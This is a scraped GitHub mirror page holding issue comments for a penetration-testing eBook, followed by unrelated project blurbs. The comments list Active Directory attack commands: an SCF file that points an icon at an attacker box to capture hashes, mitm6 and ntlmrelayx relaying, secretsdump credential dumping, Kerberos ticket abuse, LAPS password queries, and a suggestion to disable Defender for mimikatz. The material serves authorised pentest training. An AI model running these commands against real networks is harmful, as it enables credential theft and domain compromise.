7minsec / ebook Goto Github PK
View Code? Open in Web Editor NEWA place to track code snippets (as well as future enhancements and typo fixes!) in 7MinSec's Light Pentest LITE eBook
A place to track code snippets (as well as future enhancements and typo fixes!) in 7MinSec's Light Pentest LITE eBook
I think would be something like this:
grep -B 9 VULNERABLE: st-vuln2-eblue.nmap | grep -i "nmap scan report for" | awk '{print $5}'
When you need to export a big list of systems (such as those you have admin access over) from BloodHound, you get a big .json file with a bunch of extra data in it. It can help to use some cat
action to slim that down:
cat export-from-bloodhound.json | jq '.nodes[].label' | tr -d '"' | sort
And to remove @domain.com:
cat export-from-bloodhound.json | jq '.nodes[].label' | tr -d '"' | awk -F’@’ ‘{print $1}’ | sort
Take all the context here and bake it in: https://7ms.us/7ms-567-how-to-build-an-intentionally-vulnerable-sql-server/
This looks awesome, test in lab:
Teach folks how to use one of these files like:
[Shell]
Command=2
IconFile=\\your.attacking.box.ip\icon.ico
[Taskbar]
Command=ToggleDesktop
If you can't browse directly to the shares you want to drop .scf files at, use Kali built-in smbclient tool to do the job:
smbclient \\\\the.ip.of.server\\sharename -U samplecompany/billybob
Offline dump:
Secretsdump -ntds Active Directory\ntds.dit -system registry/SYSTEM -hashes lmhash:nthash LOCAL -outputfile loot/bigdump
Secretsdump from a local machine:
python3 secretsdump.py test.local/john:[email protected]
Spin up a loot share
smbserver.py share2 /share -smb2support
Kick things off with mitm6
sudo python3 /opt/mitm6/mitm6/mitm6.py -i eth0 -d pwn.town --no-ra --ignore-nofqdn
Get the relay going:
sudo python3 /opt/impacket/examples/ntlmrelayx.py -6 -wh doesntexist -t ldaps://10.0.7.100 -smb2support --delegate-access
In the cme.conf
file you can change from Pwn3d
to something else
Maybe stick it in the footer so it's easily visible?
Find vulns with Certify, certipy, certi.
And maybe talk about tools to find/remediate these vulns, like the SpecterOps stuff and https://github.com/TrimarcJake/Locksmith
(tied to 7MinSec/LPLITE#24)
Getst.py -spn cifs/somedc.domain.com domain.com/user -dc-ip ip.of.some.dc
^^^ this might not work?
getTGT.py 'contoso.local/Anakin:Vader1234!'
Export KRB5CCNAME=user.ccache
Secretsdump -debug -k FQDN.OF.SOMEBOX
But this does?
Secretsdump domain.com/user@somebox
Some folks have reported the PDF is a bit hard to copy and paste from. Would be helpful to host some code snippets directly from here.
This is awesome: https://github.com/NetSPI/PowerHuntShares
Write about it in the book. kthxbye.
These DPAT resources are awesome:
This bit of code helped me parse out all the groups:
Get-AdGroup -Filter * | % { Get-AdGroupMember $_.Name | Select-Object -ExpandProperty SamAccountName | Out-File -FilePath "$($_.Name).txt" -Encoding ASCII }
Pull in some mimikatz tips like you do in LPLITE lab. (i.e. PS remote session, turn off Defender, make a dump file). Maybe mention the many ways to do mimikatz'ing:
It's good!
$filePath = "hosts.txt"
$exportPath = "output.csv"
$hostnames = Get-Content $filePath
$table = @()
foreach ($hostname in $hostnames) {
try {
$ipAddress = [System.Net.Dns]::GetHostAddresses($hostname) | Select-Object -ExpandProperty IPAddressToString
$table += [PSCustomObject]@{
Hostname = $hostname
IPAddress = $ipAddress
}
}
catch {
$table += [PSCustomObject]@{
Hostname = $hostname
IPAddress = 'N/A'
}
}
}
# Sort the table by IP address
$table = $table | Sort-Object IPAddress
# Export the sorted table to CSV
$table | Export-Csv -Path $exportPath -NoTypeInformation
A nice nugget from a reader:
Get-ADUser -filter {enabled -eq $true} -Properties * | ForEach-Object{$_.psobject.properties| Where-Object {($_.Name -notmatch "MemberOf|PropertyNames") -and ($_.Value -like "*passw*")}}|Select-Object baseobject,name,value|sort-object baseobject | export-csv users.csv
Need to test this in the lab first.
This snippet helps:
cat st-all.gnmap | grep -i "623/open" | awk '/open/{print $3}' | tr -d '()' | sort > 623-maybe-open.txt
Query to find all LAPS passwords:
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -Properties 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime' | select dnshostname,ms-mcs-admpwd
Yeah that's a good idea.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.